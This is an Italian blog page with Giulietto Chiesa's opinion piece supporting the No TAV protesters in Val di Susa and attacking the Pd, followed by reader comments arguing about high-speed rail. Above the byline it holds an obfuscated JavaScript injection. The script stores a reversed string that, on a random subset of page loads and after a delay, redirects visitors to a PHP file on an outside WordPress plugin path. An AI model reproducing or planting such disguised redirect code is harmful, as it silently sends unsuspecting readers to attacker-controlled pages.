Difendiamo la Val di Susa e i suoi abitanti

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2011/06/No-Tav-Venaus-Val-di-Susa.jpg”>di Giulietto Chiesa

Arrivano notizie splendide dalla Val di Susa, intellettualmente e moralmente.

Arrivano notizie orribili da Torino. Dove il nuovo sindaco, Piero Fassino, del Pd, ha sostanzialmente invitato alla repressione, dichiarando a più riprese che “l’alta velocità s’ha da fare”. A quanto pare, a tutti i costi.

Al Pd non è bastato fare la guerra in Libia, bombardando anche i civili. Adesso il centrosinistra lancia la caccia all’uomo in Val di Susa. Poiché è evidente che, per cominciare i lavori, occorrerà l’intervento della Polizia, dei Carabinieri, della Guardia di Finanza, che bastoneranno, lanceranno gas lacrimogeni, e poi arresteranno i “facinorosi” che vogliono difendere la loro valle (ma anche tutti noi) e il semplice buon senso.

Questo significa molte cose. La più importante delle quali è che il centrosinistra (se Fassino e Chiamparino sono il centrosinistra, e mi pare che lo siano) si candida come la forza repressiva antipopolare più attiva e belligerante. Possiamo già immaginare come questa gente gestirà la macelleria sociale che si annuncia, con tagli alle spese per i prossimi dieci anni, al ritmo di 45 miliardi di euro all’anno.

Io non nutrivo illusioni su questa gente, che qualcuno ancora continua a definire “sinistra”, con il sindaco di Firenze Renzi, il rottamatore da rottamare, che è per la privatizzazione dell’acqua insieme a Chiamparino.

Io sto con la gente della Val di Susa, sono contro la privatizzazione dell’acqua, e contro il nucleare. Voterò quattro Sì al referendum.

E finisco con una domanda ai giovani e meno giovani che hanno militato, e forse ancora militano, nelle “fabbriche di Niki“. Ragazzi, ma è con il Pd che volevate andare? Con questo Pd che promuove la guerra? Con questo Pd che ha inventato il precariato? Con questo Pd che vuole bastonare i No TAV?

Lo chiedo a voi dopo che ho letto e sentito Vendola. Dove voglia andare lui l’avevo capito da tempo. Mi interessa sapere dove volete andare voi.

0 Comments

  1. ABCATJIA1943

    Io sono di una ignoranza abissale, sia in dialettica che in composizione, ma una cosa la voglio comunque dire. Siamo nel 2011 ed il mondo progredisce, e progredisce a passi da gigante!!! Cosa vogliamo fare? Per mantenere una “valle chiusa” idilliaca fin che volete come la Val di Susa stiamo scatenando una guerra civile di proporzione ridotta, ma guerra è, fra Valsusini e forze dell’ordine Italiane? I componenti di queste forze sono figli di tutti noi ,torinesi, astigiani, milanesi, fiorentini, romani, etc. ed i questi giorni abbiamo visto come si sono prestati i black bloc figli di………. nessuno, venuti da ogni dove, Europa compresa a guerreggiare una guerra che non è una guerra e oltrettutto non è neppure la loro!!! Dobbiamo per prima cosa distanziarci nettamente da queste forze indegne di un popolo come il nostro e poi addivenire, specialmente noi anziani, ad una migliore intesa con il governo circa la salvaguardia del territorio e lo smaltimento dello smarino. Il passato appartiene al passato, è il futuro che avanza, e per questo futuro dobbiamo abbattere le barriere che ci impediscono di spostarci con velocità da un Paese ad un altro. Sicuramente sarà stato bello spostarsi in carrozza con un tiro a quattro, ma quei tempi sono finiti. Credete che noi mugellani siamo stati felici di veder sventrare la nostra valle per far posto all’alta velocità? No di certo!!! Ma oggi che posso andare a Milano a trovare mio figlio e i miei nipoti in 105 minuti contro le 3 ore dell’ Eurostar dico grazie, grazie, e poi ancora grazie. Provare per credere. Assoggettiamoci all’ineluttabilità e non facciamoci condizionare da chi cerca rinverdimenti di gloria passata, o di chi pur di fare del male si mischia a onorevoli persone che dimostrano pacificamente.

    Reply
  2. Lisa

    ah bè, c’è una persona che è contenta perchè risparmia tempo per andare a trovare i nipoti? allora basta, si vede che valeva la pena devastare il mugello, seccare le fonti e arricchire i soliti! evviva il futuro che avanza! evviva questi anziani così saggi e ottimisti che non si preoccupano dei debiti che pagheranno i nipoti!

    Reply
  3. ABCATJIA1943

    Il discorso è più articolato ma la Lisa ha fatto un sunto da par suo, cioè da testa di girasole, cara mia girasole, perchè penso che lei sia così proprio un girasole, che volta la testa versus gli anziani, e lecca i “francobolli” ai grilli e le lumache. Per sua informativa bella topina di grano, la informo che io ho pagato delle bellissime tasse, essendo stata una impiegata commerciale con i contro fiocchi!!!!! E a lei, che attacca e fugge, e che si degna di mangiare solo dalle mani di chi sporca tutto auguro una lunga e felice vita di Cambronne.

    Reply
  4. DANX

    Abatjia, che ignoranza, non lo sa che in Valle di Susa ci sono due statali due, un’autostrada alquanto recente una e pure una ferrovia internazionale una per merci e persone?
    Ah, nelle foreste pluviali la gente vive sugli alberi ed è molto più felice di lei e di me e di tutti quanti noi..rifletta e non sia schiava della società in cui s’è ritrovata per puro caso!

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *